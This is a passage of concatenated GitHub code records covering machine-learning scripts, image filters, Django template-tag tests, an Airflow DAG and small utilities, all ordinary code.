output[0]\n\n\ndef summarize(text, model, tokenizer):\n output = generate_(text, model_=model, tokenizer_=tokenizer)\n return output\n\n\ndef array_to_string(array):\n text = \"\"\n for ele in array:\n text += ele + \" \"\n text = text.replace(\"\\n\", \"\").replace(\"\\r\", \"\")\n return text\n\n\ndef run(checkpoint_path, test_file, output_file, model_id):\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n print(f\"Device is set to {device}\")\n\n tokenizer = PegasusTokenizer.from_pretrained(\n model_id)\n\n pegasus_model = PegasusForConditionalGeneration.from_pretrained(\n model_id)\n\n model = PegasusLightning.load_from_checkpoint(\n checkpoint_path=checkpoint_path, strict=False, tokenizer=tokenizer, model=pegasus_model)\n\n model.to(torch.device('cuda'))\n model.eval()\n\n print(\"Starting GENERATION\")\n\n # ---------Variable to be set:\n file_path = test_file\n output_file_path = output_file\n # --------------------------\n file = open(file_path, \"r\", encoding=\"utf-8\")\n output = open(output_file_path, \"a\", encoding=\"utf-8\")\n lines = file.readlines()\n for i in range(len(lines)):\n data = json.loads(lines[i])\n result = summarize(array_to_string(\n data[\"source\"]), model=model, tokenizer=tokenizer)\n print(str(result))\n output.write(str(result) + \" \\n\")\n print(f\"Processed TLDR #{i} from total {len(lines)} TLDRs\")\n output.close()\n file.close()\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n # Required parameters\n parser.add_argument(\"--checkpoint_path\", type=str,\n help=\"Path of the checkpoint file to be used.\")\n parser.add_argument(\"--test_file\", type=str,\n help=\"Path to the test file containing the documents.\")\n parser.add_argument(\"--output_file\", type=str,\n help=\"File to save generated summaries in.\")\n parser.add_argument(\"--model-id\", type=str, required=False, default=\"google/pegasus-large\",\n help=\"Exact PEGASUS model checkpoint from huggingface to initialize the model.\")\n\n args = parser.parse_args()\n run(args.checkpoint_path, args.test_file,\n args.output_file, args.model_id)\n","repo_name":"nfriedri/CLS-Platform","sub_path":"backend/scripts/pegasus_lightning_model.py","file_name":"pegasus_lightning_model.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"4132645126","text":"from .utils_model import *\nfrom torch.utils.data.dataset import Dataset\nfrom analysis.opticflow import ROFL, HyperFlow\n\n\n# noinspection PyUnresolvedReferences\nclass ROFLDS(Dataset):\n\tdef __init__(\n\t\t\tself,\n\t\t\tpath: str,\n\t\t\tmode: str,\n\t\t\tdevice: torch.device = None,\n\t):\n\t\t# category & n_obj\n\t\tsim = path.split('/')[-1].split('_')[0]\n\t\tself.category = sim[:-1]\n\t\tself.n_obj = int(sim[-1])\n\t\t# attributes\n\t\tself.attrs = np.load(\n\t\t\tpjoin(path, 'attrs.npy'),\n\t\t\tallow_pickle=True,\n\t\t).item()\n\t\tself.f = self.attrs.pop('f')\n\t\tself.f_aux = self.attrs.pop('f_aux')\n\t\t# mode = trn/vld/tst\n\t\tpath = pjoin(path, mode)\n\t\tkws = dict(mmap_mode='r')\n\t\t# generative factors\n\t\tself.g = np.load(pjoin(path, 'g.npy'), **kws)\n\t\tself.g_aux = np.load(pjoin(path, 'g_aux.npy'), **kws)\n\t\t# data & norm\n\t\tself.x = np.load(pjoin(path, 'x.npy'), **kws)\n\t\tself.norm = np.load(pjoin(path, 'norm.npy'), **kws)\n\t\tif device is not None:\n\t\t\tself.x = torch.tensor(\n\t\t\t\tdata=self.x,\n\t\t\t\tdevice=device,\n\t\t\t\tdtype=torch.float,\n\t\t\t)\n\t\t\tself.norm = torch.tensor(\n\t\t\t\tdata=self.norm,\n\t\t\t\tdevice=device,\n\t\t\t\tdtype=torch.float,\n\t\t\t)\n\t\tif self.category == 'obj':\n\t\t\tself.transform = _shift_mu\n\t\telse:\n\t\t\tself.transform = None\n\n\tdef __len__(self):\n\t\treturn len(self.x)\n\n\tdef __getitem__(self, i):\n\t\tif self.transform is not None:\n\t\t\tx = self.transform(self.x[i])\n\t\telse:\n\t\t\tx = self.x[i]\n\t\treturn x, self.norm[i]\n\n\ndef _shift_mu(x):\n\treturn x - torch.mean(x)\n\n\ndef generate_simulation(\n\t\tcategory: str,\n\t\tn_obj: int,\n\t\ttotal: int,\n\t\tkwargs: dict,\n\t\taccept_n: dict,\n\t\tmin_obj_size: int,\n\t\tdtype='float32', ):\n\tkws = kwargs.copy()\n\tkws['category'] = category\n\tkws['n_obj'] = n_obj\n\tkws['seed'] = 0\n\n\tshape = (total, kws['dim'], kws['dim'], 2)\n\talpha_dot = np.empty(shape, dtype=dtype)\n\tg_all, g_aux_all = [], []\n\n\tcnt = 0\n\twhile True:\n\t\t# generate\n\t\tof = ROFL(**kws).compute_coords()\n\t\t_ = of.compute_flow()\n\t\t# accept\n\t\taccept = of.filter(\n\t\t\tmin_obj_size=min_obj_size,\n\t\t\tmin_n_obj=accept_n[n_obj],\n\t\t)\n\t\tf, g, f_aux, g_aux = of.groundtruth_factors()\n\t\tind = range(cnt, min(cnt + accept.sum(), total))\n\t\talpha_dot[ind] = of.alpha_dot[accept][:len(ind)].astype(dtype)\n\t\tg_aux_all.append(g_aux[accept])\n\t\tg_all.append(g[accept])\n\t\tcnt += accept.sum()\n\t\tif cnt >= total:\n\t\t\tbreak\n\t\tkws['seed'] += 1\n\n\talpha_dot = np.transpose(alpha_dot, (0, -1, 1, 2))\n\tg_all, g_aux_all = cat_map([g_all, g_aux_all], axis=0)\n\tg_all, g_aux_all = g_all[:, :total], g_aux_all[:, :total]\n\n\tattrs = {\n\t\t'f': f,\n\t\t'f_aux': f_aux,\n\t\t'category': of.category,\n\t\t'n_obj': of.n_obj,\n\t\t'dim': of.dim,\n\t\t'fov': of.fov,\n\t\t'res': of.res,\n\t\t'z_bg': of.z_bg,\n\t\t'obj_r': of.obj_r,\n\t\t'obj_bound': of.obj_bound,\n\t\t'obj_zlim': of.obj_zlim,\n\t\t'vlim_obj': of.vlim_obj,\n\t\t'vlim_slf': of.vlim_slf,\n\t\t'residual': of.residual,\n\t\t'seeds': range(kws['seed'] + 1),\n\t}\n\treturn alpha_dot, g_all, g_aux_all, attrs\n\n\ndef save_simulation(\n\t\tsave_dir: str,\n\t\tx: np.ndarray,\n\t\tg: np.ndarray,\n\t\tg_aux: np.ndarray,\n\t\tattrs: dict,\n\t\tsplit: dict = None, ):\n\tn = len(x)\n\tname = '_'.join([\n\t\tf\"{attrs['category']}{attrs['n_obj']}\",\n\t\tf\"dim-{attrs['dim']}\",\n\t\tf\"n-{n//1000}k\",\n\t])\n\tpath = pjoin(save_dir, name)\n\tos.makedirs(path, exist_ok=True)\n\t# save attrs\n\tsave_obj(\n\t\tobj=attrs,\n\t\tsave_dir=path,\n\t\tfile_name='attrs',\n\t\tverbose=False,\n\t\tmode='npy',\n\t)\n\t# save data\n\tsplit = split if split else {\n\t\t'trn': int(0.8 * n),\n\t\t'vld': int(0.1 * n),\n\t\t'tst': int(0.1 * n),\n\t}\n\tassert sum(split.values()) == n\n\ti = 0\n\tsplit_ids = {}\n\tfor k, v in split.items():\n\t\tsplit_ids[k] = range(i, i + v)\n\t\ti += v\n\tfor a, b in itertools.combinations(split_ids.values(), 2):\n\t\tassert not set(a).intersection(b)\n\n\tfor lbl, ids in split_ids.items():\n\t\t_path = pjoin(path, lbl)\n\t\tos.makedirs(_path, exist_ok=True)\n\t\tkws = dict(\n\t\t\tsave_dir=_path,\n\t\t\tverbose=False,\n\t\t\tmode='npy',\n\t\t)\n\t\t# generative factors\n\t\tkws['obj'] = g[ids]\n\t\tkws['file_name'] = 'g'\n\t\tsave_obj(**kws)\n\t\t# generative factors (aux)\n\t\tkws['obj'] = g_aux[ids]\n\t\tkws['file_name'] = 'g_aux'\n\t\tsave_obj(**kws)\n\t\t# flow frames\n\t\tkws['obj'] = x[ids]\n\t\tkws['file_name'] = 'x'\n\t\tsave_obj(**kws)\n\t\t# norm\n\t\tkws['obj'] = np.sum(sp_lin.norm(\n\t\t\tx[ids], axis=1), axis=(1, 2))\n\t\tkws['file_name'] = 'norm'\n\t\tsave_obj(**kws)\n\treturn\n\n\ndef load_ephys(\n\t\tgroup: h5py.Group,\n\t\tkws_hf: dict = None,\n\t\trescale: float = 2.0,\n\t\tdtype: str = 'float32', ):\n\tkws_hf = kws_hf if kws_hf else {\n\t\t'dim': 17, 'apply_mask': True}\n\tkws_hf['fov'] = group.attrs.get(\n\t\t'designsize', 30.0) / 2\n\tdiameter = np.array(group['hf_diameter'])\n\t# inconsistent diameters throughout the expt?\n\tif len(set(group.attrs.get('diameter'))) != 1:\n\t\tif 'hf_diameterR' in group:\n\t\t\tdiameter = np.concatenate([\n\t\t\t\tdiameter,\n\t\t\t\tnp.array(group['hf_diameterR']),\n\t\t\t])\n\t\tdiameter = diameter.mean()\n\t\tdiameter_r = diameter\n\telse:\n\t\tdiameter_r = None\n\n\thf = HyperFlow(\n\t\tparams=np.array(group['hf_params']),\n\t\tcenter=np.array(group['hf_center']),\n\t\tdiameter=diameter,\n\t\t**kws_hf,\n\t)\n\tstim = hf.compute_hyperflow(dtype=dtype)\n\tspks = np.array(group['spks'], dtype=float)\n\tif 'badspks' in group:\n\t\tmask = ~np.array(group['badspks'], dtype=bool)\n\telse:\n\t\tmask = np.ones(len(spks), dtype=bool)\n\tstim_r, spks_r, good_r = setup_repeat_data(\n\t\tgroup=group,\n\t\tkws_hf=kws_hf,\n\t\tdiameter=diameter_r,\n\t)\n\n\tif rescale is not None:\n\t\tstim_scale = np.max(np.abs(stim))\n\t\tstim *= rescale / stim_scale\n\t\tif stim_r is not None:\n\t\t\tstim_r *= rescale / stim_scale\n\n\treturn stim, spks, mask, stim_r, spks_r, good_r\n\n\ndef setup_repeat_data(\n\t\tgroup: h5py.Group,\n\t\tkws_hf: dict,\n\t\tdiameter: float = None, ):\n\tif not group.attrs.get('has_repeats'):\n\t\treturn None, None, None\n\n\tpsth = np.array(group['psth_raw_all'], dtype=float)\n\tbadspks = np.array(group['fix_lost_all'], dtype=bool)\n\ttstart = np.array(group['tind_start_all'], dtype=int)\n\tassert (tstart == tstart[0]).all()\n\ttstart = tstart[0]\n\tnc, _, length = psth.shape\n\tintvl = range(tstart[1], tstart[1] + length)\n\n\t# stim\n\thf = HyperFlow(\n\t\tparams=np.array(group['hf_paramsR']),\n\t\tcenter=np.array(group['hf_centerR']),\n\t\tdiameter=diameter if diameter else\n\t\tnp.array(group['hf_diameterR']),\n\t\t**kws_hf,\n\t)\n\tstim = hf.compute_hyperflow()\n\tstim = stim[range(intvl.stop)]\n\tintvl = np.array(intvl)\n\n\t# spks\n\t_spks = np.array(group['spksR'], dtype=float)\n\tspks = np_nans(psth.shape)\n\tfor i in range(nc):\n\t\tfor trial, t in enumerate(tstart):\n\t\t\ts_ = range(t, t + length)\n\t\t\tspks[i][trial] = _spks[:, i][s_]\n\tspks[badspks] = np.nan\n\n\treturn stim, spks, intvl\n\n\ndef setup_supervised_data(\n\t\tlags: int,\n\t\tgood: np.ndarray,\n\t\tstim: np.ndarray,\n\t\tspks: np.ndarray, ):\n\tassert len(stim) == len(spks), \"must have same nt\"\n\tidxs = good.copy()\n\tidxs = idxs[idxs > lags]\n\tsrc = time_embed(stim, lags, idxs)\n\ttgt = spks[idxs]\n\tassert len(src) == len(tgt), \"must have same length\"\n\treturn src, tgt\n\n\ndef time_embed(x, lags, idxs=None):\n\tassert len(x) > lags\n\tif idxs is None:\n\t\tidxs = range(lags, len(x))\n\tx_emb = []\n\tfor t in idxs:\n\t\tx_emb.append(np.expand_dims(\n\t\t\tx[t - lags: t], axis=0))\n\treturn np.concatenate(x_emb)\n\n\ndef simulation_combos():\n\tcombos = [('fixate', i) for i in [0, 1]]\n\tcombos += [('transl', i) for i in [0, 1]]\n\tcombos += [('obj', i) for i in [1]]\n\treturn combos\n\n\ndef _setup_args() -> argparse.Namespace:\n\tparser = argparse.ArgumentParser()\n\n\tparser.add_argument(\n\t\t\"n_tot\",\n\t\thelp='# frames total',\n\t\ttype=int,\n\t)\n\tparser.add_argument(\n\t\t\"--n_batch\",\n\t\thelp='# frames per batch',\n\t\tdefault=int(5e4),\n\t\ttype=int,\n\t)\n\tparser.add_argument(\n\t\t\"--dim\",\n\t\thelp='dimensionality',\n\t\tdefault=33,\n\t\ttype=int,\n\t)\n\tparser.add_argument(\n\t\t\"--min_obj_size\",\n\t\thelp='minimum acceptable object size',\n\t\tdefault=10.5,\n\t\ttype=float,\n\t)\n\tparser.add_argument(\n\t\t\"--dtype\",\n\t\thelp='dtype for alpha_dot',\n\t\tdefault='float32',\n\t\ttype=str,\n\t)\n\treturn parser.parse_args()\n\n\ndef _main():\n\targs = _setup_args()\n\tprint(args)\n\n\tkws = dict(\n\t\tn=args.n_batch,\n\t\tdim=args.dim,\n\t\tfov=45.0,\n\t\tobj_r=0.25,\n\t\tobj_bound=1.0,\n\t\tobj_zlim=(0.5, 1.0),\n\t\tvlim_obj=(0.01, 1.0),\n\t\tvlim_slf=(0.01, 1.0),\n\t\tresidual=False,\n\t\tz_bg=1.0,\n\t\tseed=0,\n\t)\n\taccept_n = {\n\t\t0: None,\n\t\t1: None,\n\t\t2: 1,\n\t\t4: 3,\n\t\t8: 5,\n\t}\n\tsave_dir = '/home/hadi/Documents/MTVAE/data'\n\tcombos = simulation_combos()\n\tprint(f\"Simulation combos:\\n{combos}\")\n\tpbar = tqdm(combos)\n\tfor category, n_obj in pbar:\n\t\tpbar.set_description(f\"creating {category}{n_obj}\")\n\t\talpha_dot, g, g_aux, attrs = generate_simulation(\n\t\t\ttotal=args.n_tot,\n\t\t\tcategory=category,\n\t\t\tn_obj=n_obj,\n\t\t\tkwargs=kws,\n\t\t\taccept_n=accept_n,\n\t\t\tmin_obj_size=args.min_obj_size,\n\t\t\tdtype=args.dtype,\n\t\t)\n\t\tsave_simulation(\n\t\t\tsave_dir=save_dir,\n\t\t\tx=alpha_dot,\n\t\t\tg=g,\n\t\t\tg_aux=g_aux,\n\t\t\tattrs=attrs,\n\t\t)\n\tprint(f\"\\n[PROGRESS] saving datasets done ({now(True)}).\\n\")\n\treturn\n\n\nif __name__ == \"__main__\":\n\t_main()\n","repo_name":"hadivafaii/_MTMST","sub_path":"base/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":8629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19962157329","text":"from plot_deconvolution import Lucy_Restoration\nfrom PIL import Image, ImageFilter, ImageOps\nfrom PIL.ImageFilter import (\n BLUR, CONTOUR, EDGE_ENHANCE, EDGE_ENHANCE_MORE,\n EMBOSS, FIND_EDGES, SHARPEN\n)\n\nimport numpy as np\n\ndef sharpenPic(curImg, counter):\n current = Image.open(curImg)\n newImg = current.filter(SHARPEN)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef blurPic(curImg, counter):\n current = Image.open(curImg)\n newImg = current.filter(BLUR)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef rotateCounter(curImg, counter):\n newImg = Image.open(curImg)\n newImg.rotate(90).save('image' + str(counter) + '.jpg')\n\n\ndef rotateClock(curImg, counter):\n newImg = Image.open(curImg)\n newImg.rotate(270).save('image' + str(counter) + '.jpg')\n\n\ndef cropPic(curImg, counter):\n current = Image.open(curImg)\n width, height = current.size\n left = width / 4\n top = height / 4\n right = 3 * width / 4\n bottom = 3 * height / 4\n newImg = current.crop((left, top, right, bottom))\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef sketchPic(curImg, counter):\n current = Image.open(curImg)\n newImg = current.filter(CONTOUR)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef oilPic(curImg, counter):\n current = Image.open(curImg)\n newImg = current.filter(EDGE_ENHANCE)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef pencilPic(curImg, counter):\n current = Image.open(curImg)\n newImg = current.filter(EDGE_ENHANCE_MORE)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef foilPic(curImg, counter):\n current = Image.open(curImg)\n newImg = current.filter(EMBOSS)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef negativePic(curImg, counter):\n current = Image.open(curImg)\n newImg = current.filter(FIND_EDGES)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef histogramEqualize(curImg, counter):\n current = Image.open(curImg)\n newImg = ImageOps.equalize(current, mask=None)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef LucyRestoration(curImg):\n current = Image.open(curImg)\n Lucy_Restoration(current)\n\ndef histogramEqualize_2(curImg, counter):\n current = Image.open(curImg)\n img_gray = current.convert(mode='L') # convert to grayscale\n img_array = np.asarray(img_gray) #convert to NumPy array\n\n histogram_array = np.bincount(img_array.flatten(), minlength=256) #flatten image array and calculate histogram via binning\n \n num_pixels = np.sum(histogram_array)\n histogram_array = histogram_array/num_pixels\n\n chistogram_array = np.cumsum(histogram_array)\n\n transform_map = np.floor(255 * chistogram_array).astype(np.uint8)\n\n img_list = list(img_array.flatten())\n\n eq_img_list = [transform_map[p] for p in img_list]\n\n eq_img_array = np.reshape(np.asarray(eq_img_list), img_array.shape)\n\n eq_img = Image.fromarray(eq_img_array, mode='L') #convert NumPy array to pillow Image and write to file\n eq_img.save('image' + str(counter) + '.jpg')","repo_name":"chungiee/CPE462_ImageProcessing","sub_path":"editFunctions.py","file_name":"editFunctions.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6906645829","text":"import numpy as np\nimport sklearn.datasets as sk_dataset\nimport pandas as pd\nimport sklearn.preprocessing as pre_processing\nimport random\nfrom collections import Counter, defaultdict\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.impute import SimpleImputer\nfrom sklearn import metrics\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\ndef max2(x):\n xp=x.copy()\n xp[xp == 1] = 0.002\n max=np.max(xp)\n return max\n\nplt.rcParams[\"font.weight\"] = \"bold\"\nplt.rcParams[\"axes.labelweight\"] = \"bold\"\nX = np.loadtxt('../数据集/[013]segment(0-1).txt')\nXp = pd.DataFrame(X[:,:-1])\n\nXp.rename(columns = {0: 'A1', 1: '', 2: 'A3', 3: '', 4: 'A5', 5: '', 6: 'A7', 7: '', 8: 'A9', 9: '',10: 'A11', 11: '', 12: 'A13', 13: '', 14: 'A15', 15: '', 16: 'A17', 17: '', 18: 'A19'},\n inplace = True)\n\n\nXp_corr=abs(Xp.corr())\nXp=np.array(Xp)\nmax=max2(Xp)\nprint(max)\nmin=np.min(Xp)\nprint(min)\n\n\nprint(Xp)\nsns.heatmap(Xp_corr, annot = False, vmin = min, vmax = max, cmap = \"hot_r\",\n annot_kws = {'size': 8, 'weight': 'bold'})\nplt.show()\n\n\nXp1=pd.DataFrame(X[:,[5,6,7,8]])\n\nXp1.rename(columns = {0: 'A6', 1: 'A7', 2: 'A8', 3: 'A9'},\n inplace = True)\n\n\nXp1=abs(Xp1.corr())\nXp2=pd.DataFrame(X[:,[9,10,11,12,14,16]])\n\nXp2.rename(columns = {0: 'A10', 1: 'A11',2: 'A12', 3: 'A13', 4: 'A15',5:'A17'},\n inplace = True)\n\n\nXp2=abs(Xp2.corr())\nsns.heatmap(Xp1, annot = True, vmin = min, vmax = max, cmap = \"hot_r\",\n annot_kws = {'size': 8, 'weight': 'bold'})\nplt.show()\n\nsns.heatmap(Xp2,annot = True, vmin = min, vmax = max, cmap = \"hot_r\",\n annot_kws = {'size': 8, 'weight': 'bold'})\nplt.show()\n\n\n\nXp3=pd.DataFrame(X[:,[9,10,11,12,14,16,8]])\n\n\nXp3.rename(columns = {0: 'A10', 1: 'A11',2: 'A12', 3: 'A13', 4: 'A15',5:'A17',6:'A9'},\n inplace = True)\n\n\nXp3=abs(Xp3.corr())\nsns.heatmap(Xp3, annot = True, vmin = min, vmax = max, cmap = \"hot_r\",\n annot_kws = {'size': 8, 'weight': 'bold'})\nplt.show()\n\n\n\n\n\n\n\n","repo_name":"ouguiliang110/NaiveBayesNetCheck","sub_path":"属性分组的RVFL集成方法/相关性对比算法.py","file_name":"相关性对比算法.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13514991284","text":"import os\nfrom unittest.mock import patch\n\nfrom django.http import HttpRequest\nfrom django.template import engines\nfrom django.test import SimpleTestCase, TestCase, override_settings\n\nfrom core.tests.templatetags.test_svg_icon import VALID_SVG\n\n\n@override_settings(\n STATICFILES_DIRS=[\n os.path.join(os.path.dirname(__file__), \"staticfiles\"),\n ]\n)\nclass SvgIconTests(TestCase):\n def setUp(self):\n self.jinja_engine = engines[\"wagtail-env\"]\n\n def test_jinja_tag(self):\n template = self.jinja_engine.from_string('{{ svg_icon(\"test\") }}')\n self.assertEqual(template.render(), VALID_SVG)\n\n @patch(\"core.templatetags.svg_icon.FALLBACK_ICON_NAME\", \"test\")\n def test_jinja_tag_fallback(self):\n template = self.jinja_engine.from_string('{{ svg_icon(\"invalid\") }}')\n self.assertEqual(template.render(), VALID_SVG)\n\n @patch(\"core.templatetags.svg_icon.FALLBACK_ICON_NAME\", \"missing\")\n def test_jinja_tag_fallback_not_found_error(self):\n template = self.jinja_engine.from_string('{{ svg_icon(\"missing\") }}')\n with self.assertRaises(FileNotFoundError):\n template.render()\n\n @patch(\"core.templatetags.svg_icon.FALLBACK_ICON_NAME\", \"invalid\")\n def test_jinja_tag_fallback_invalid_error(self):\n template = self.jinja_engine.from_string('{{ svg_icon(\"invalid\") }}')\n with self.assertRaises(ValueError):\n template.render()\n\n\n@override_settings(FLAGS={\"MY_FLAG\": [(\"boolean\", True)]})\nclass FeatureFlagTests(TestCase):\n def setUp(self):\n self.jinja_engine = engines[\"wagtail-env\"]\n\n def test_flag_enabled_tag(self):\n template = self.jinja_engine.from_string(\n '{{ flag_enabled(\"MY_FLAG\") }}'\n )\n self.assertEqual(template.render({\"request\": None}), \"True\")\n\n def test_flag_disabled_tag(self):\n template = self.jinja_engine.from_string(\n '{{ flag_disabled(\"MY_FLAG\") }}'\n )\n self.assertEqual(template.render({\"request\": None}), \"False\")\n\n\nclass SlugifyUniqueTests(SimpleTestCase):\n def setUp(self):\n self.engine = engines[\"wagtail-env\"]\n self.template = '{{ \"Some text\" | slugify_unique }}'\n\n def render(self, template, context=None):\n return self.engine.from_string(template).render(context=context)\n\n def test_no_context(self):\n self.assertEqual(self.render(self.template), \"some-text\")\n\n def test_no_request_in_context(self):\n self.assertEqual(self.render(self.template, {}), \"some-text\")\n\n def test_render_with_request_in_context(self):\n self.assertEqual(\n self.render(self.template, {\"request\": HttpRequest()}), \"some-text\"\n )\n\n def test_render_uses_request_to_make_multiple_unique_slugs(self):\n request = HttpRequest()\n template = \" and \".join([self.template, self.template])\n self.assertEqual(\n self.render(template, {\"request\": request}),\n \"some-text and some-text-1\",\n )\n\n def test_render_without_request_repeats_slugs(self):\n template = \" and \".join([self.template, self.template])\n self.assertEqual(self.render(template), \"some-text and some-text\")\n\n def test_multiple_renders_multiple_unique_slugs(self):\n request = HttpRequest()\n rendered = [\n self.render(self.template, {\"request\": request}) for _ in range(5)\n ]\n\n self.assertEqual(\n rendered,\n [\n \"some-text\",\n \"some-text-1\",\n \"some-text-2\",\n \"some-text-3\",\n \"some-text-4\",\n ],\n )\n\n def test_different_requests_allow_repeats(self):\n for _ in range(5):\n self.assertEqual(\n self.render(self.template, {\"request\": HttpRequest()}),\n \"some-text\",\n )\n\n\nclass LanguageTagTests(SimpleTestCase):\n def setUp(self):\n self.engine = engines[\"wagtail-env\"]\n\n def render(self, template):\n return self.engine.from_string(template).render()\n\n def test_english_translation(self):\n self.assertEqual(\n self.render(\n \"{% language 'en' %}{{ _( 'English' ) }}{% endlanguage %}\"\n ),\n \"English\",\n )\n\n def test_spanish_translation(self):\n self.assertEqual(\n self.render(\n \"{% language 'es' %}{{ _( 'English' ) }}{% endlanguage %}\"\n ),\n \"Inglés\",\n )\n","repo_name":"cfpb/consumerfinance.gov","sub_path":"cfgov/core/tests/test_jinja2tags.py","file_name":"test_jinja2tags.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","stars":241,"dataset":"github-code","pt":"37"} +{"seq_id":"71647619948","text":"\nimport json\n\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import StandardScaler\n\n\ndef preprocess(train_data_path: str, test_data_path: str, json_path: str):\n df_train = pd.read_csv(train_data_path).drop(\"ID\", axis=1)\n df_test = pd.read_csv(test_data_path).drop(\"ID\", axis=1)\n\n # concatenate\n df_test[\"price\"] = \"test\"\n df = pd.concat([df_train, df_test], axis=0)\n\n # add region column\n with open(json_path, \"r\") as f:\n df[\"region\"] = df[\"loc\"].map(json.load(f))\n\n # bedroom to bathroom ratio\n df[\"bed_bath_ratio\"] = df[\"bedroom\"] / df[\"bathroom\"]\n\n # encode title column by ranks based on highest mean prices\n title_ranks = (\n df_train.groupby(\"title\")[\"price\"]\n .mean()\n .sort_values(ascending=False)\n .rank(method=\"dense\")\n .astype(int)\n )\n df[\"title_rank\"] = df[\"title\"].map(title_ranks)\n df.drop(\"title\", axis=1, inplace=True)\n\n # rearrange to ensure 'price' is the last column\n price_col = df.pop(\"price\")\n df.insert(len(df.columns), \"price\", price_col)\n\n # split\n df_train = df[~df[\"price\"].astype(str).str.contains(\"test\")]\n df_test = df[df[\"price\"].astype(str).str.contains(\"test\")]\n\n df_train = df_train.reset_index(drop=True)\n df_test = df_test.reset_index(drop=True)\n\n # label encoding\n le = LabelEncoder()\n\n for col in [\"loc\", \"region\"]:\n le = le.fit(df_train[col])\n df_train[col] = le.transform(df_train[col])\n df_test[col] = le.transform(df_test[col])\n\n # another split\n X = df_train.drop(\"price\", axis=1)\n y = df_train[\"price\"].astype(float)\n X_test = df_test.drop(\"price\", axis=1)\n\n\n # fill null values\n imp_mode = SimpleImputer(missing_values=np.nan, strategy=\"most_frequent\")\n imp_mode.fit(X)\n\n X = pd.DataFrame(imp_mode.transform(X), columns=X.columns)\n X_test = pd.DataFrame(imp_mode.transform(X_test), columns=X.columns)\n\n # scale the dataset with standard scaler\n scaler = StandardScaler()\n train_scaler = scaler.fit(X)\n X = train_scaler.transform(X)\n X_test = train_scaler.transform(X_test)\n \n # make X a dataframe again\n X = pd.DataFrame(X, columns=df_train.columns[0:-1])\n\n return X, y, X_test\n\n\nif __name__ == \"__main__\":\n preprocess()\n","repo_name":"veronicaeyo/house_price_prediction","sub_path":"scripts/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26011028519","text":"# PROJECT EULER PROBLEM 72 - Counting Fractions\n\nfrom findDivisorsII import findDivisors\nfrom findFactorsII import findFactors\nfrom memoise import Memoise\nimport primeCheckII\n\n@Memoise\ndef countFractions(N):\n s = N-1\n if not primeCheckII.PrimeCheck(N): \n D = findDivisors(N,False,False)\n s -= sum([countFractions(d) for d in D])\n return(s)\n\n\nmax_N = 1000000\ntotal = 0\nfor N in range(max_N,1,-1):\n if N%1000 == 0:\n print(N)\n total += countFractions(N)\n\nprint(total)\n\n","repo_name":"randolchance/PythonProjects","sub_path":"ProjectEulerSolutions/PE72/PE72-CountingFractions.py","file_name":"PE72-CountingFractions.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10193153328","text":"#!/usr/bin/env python3\n\nimport sys\n\nx = open(sys.argv[1], 'r').read()\nx = x.split('\\n')\nc = 0\narr = []\nfor i in x:\n if i != '': c+=1\n else: arr.append(c); c = 0\n\nprint(sum(arr)/len(arr))\n","repo_name":"psuriset/kvm_io","sub_path":"extract_pattern.py","file_name":"extract_pattern.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"74104195948","text":"from airflow import DAG, Dataset\r\nfrom airflow.decorators import task\r\n\r\nfrom datetime import datetime\r\n\r\n# Here is a dataset\r\nmy_file = Dataset('/tmp/my_file.txt')\r\nmy_file_2 = Dataset('/tmp/my_file_2.txt')\r\n\r\n# We create the Producer DAG\r\n# This DAG is in charge of updating the dataset that will trigger the consumer DAG\r\nwith DAG(\r\n dag_id=\"producer\",\r\n schedule=\"@daily\",\r\n start_date=datetime(2023, 1, 5),\r\n):\r\n\r\n # Here is a task that uses the dataset\r\n #we indicate what task updates the dataset usning the outlets parameter\r\n @task(outlets=[my_file])\r\n def update_dataset():\r\n with open(my_file.uri, \"a+\") as f:\r\n f.write(\"producer update\")\r\n\r\n @task(outlets=[my_file_2])\r\n def update_dataset_2():\r\n with open(my_file_2.uri, \"a+\") as f:\r\n f.write(\"producer update\")\r\n \r\n update_dataset() >> update_dataset_2()","repo_name":"fmaver/Airflow","sub_path":"dags/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18489473781","text":"from osoba import Osoba\n\nclass Pracownik(Osoba):\n def __init__(self,imie,wiek,waga,wzrost,firma,stanowisko,latapracy,wynagrodzenie):\n super().__init__(imie,wiek,waga,wzrost)\n self.firma = firma\n self.stanowisko = stanowisko\n self.latapracy = latapracy\n self.wynagrodzenie = wynagrodzenie\n self.pracownik = True\n\n def print_pracownik(self):\n print(f'dane pracownika -> firma: {self.firma}, stanowisko pracy: {self.stanowisko}, '\n 